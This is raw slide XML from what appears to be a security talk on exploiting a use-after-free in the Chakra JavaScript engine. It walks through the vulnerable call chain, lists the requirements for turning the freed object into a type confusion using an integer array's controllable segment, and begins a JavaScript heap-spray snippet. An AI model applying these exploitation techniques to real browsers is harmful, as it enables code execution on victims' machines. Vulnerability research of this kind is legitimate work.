          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2.chakra!CJavascriptOperations::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GetProperty</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3.chakra!Js::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavascriptOperators</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OP_GetProperty</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4. Calling object virtual function vt+0x88</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="直接箭头连接符 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BF5A059-10EC-4065-81A4-71C9ECBB76EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3892550" y="5245101"/>
            <a:ext cx="0" cy="857250"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="9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25" name="直接箭头连接符 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2009FDCF-07A1-4ABB-B79A-CD8B6659163E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3898900" y="6375401"/>
            <a:ext cx="0" cy="857250"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="95000"/>
              </a:schemeClr>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25E203A3-782F-4ECC-A74D-285DC03EFF7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3898900" y="7505701"/>
            <a:ext cx="0" cy="857250"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="95000"/>
              </a:schemeClr>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28250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3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0E45B2A-859B-4979-9452-FDBF436C9D62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="3297038"/>
            <a:ext cx="10953455" cy="4204100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It can be seen from the above that in order to meet the requirements of some of the above functions, we need to fake an object to occupy, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> type confusion.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To achieve type confusion, the occupied object have the following requirements:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Must use an object to occupy(occupy dynamic object)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Occupied object must have the ability to potentially out of bound reading and writing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Occupied object need to pass type check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" indent="-742950">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Occupied object need to have useful virtual function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39775544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2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FCB1E2D-F987-4D2A-AE58-6BF93AE57E04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078124" y="2701300"/>
            <a:ext cx="9234275" cy="772776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Select an integer array to occupy, and use the controllable data on the segment to implement type confusion.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7602ABA6-2126-410A-863B-4C1D291C14A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078124" y="3568699"/>
            <a:ext cx="8585351" cy="4318001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BA4C4B9-1285-4B82-864F-8243ABE0AC01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079777" y="8033600"/>
            <a:ext cx="10951803" cy="1793440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>When the integer array element is less than 16, the segment is assigned after the integer array object.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>When Occupying, try to use the controllable data segment of the integer array to occupy the released dynamic object.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDE1DD8C-01E6-4E66-8E29-B99F97DA78AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3972497" y="5399881"/>
            <a:ext cx="2644203" cy="31511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8FB23978-A66E-447E-A95B-9027A57F2CF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078123" y="6354677"/>
            <a:ext cx="2644203" cy="31511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5" name="连接符: 肘形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAC71F5B-9794-4454-96B2-BB25246328B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="13" idx="2"/>
            <a:endCxn id="14" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4109845" y="5327482"/>
            <a:ext cx="797237" cy="1572273"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">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33750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3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F387EEAF-99BC-4E31-813E-CF7D11576620}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="3225800"/>
            <a:ext cx="10953455" cy="7025353"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="2">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>pre_cnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> = 0x2001;	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>pre_arr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> = new Array(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>pre_cnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>for (var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=0;i&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>pre_cnt;i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>++){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>pre_arr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>] = {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>            key0: 0x00000001,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>            key1: 0x00000003,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>            key2: 0x00000005,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>            key3: 0x00000007,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>            key4: 0x00000009,	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>            key5: 0x0000000b,		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>            key6: 0x0000000d,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>            key7: 0x0000000f,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>            key8: 0x00000011,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>            key9: 0x00000013,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>keya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: 0x00000015,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>keyb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>: 0x00000017</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        };</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>	</a:t>
            </a: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endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>cnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t> = 0x20;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>obj_arr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> = new Array(</a:t>
            </a:r>
            <a:r>
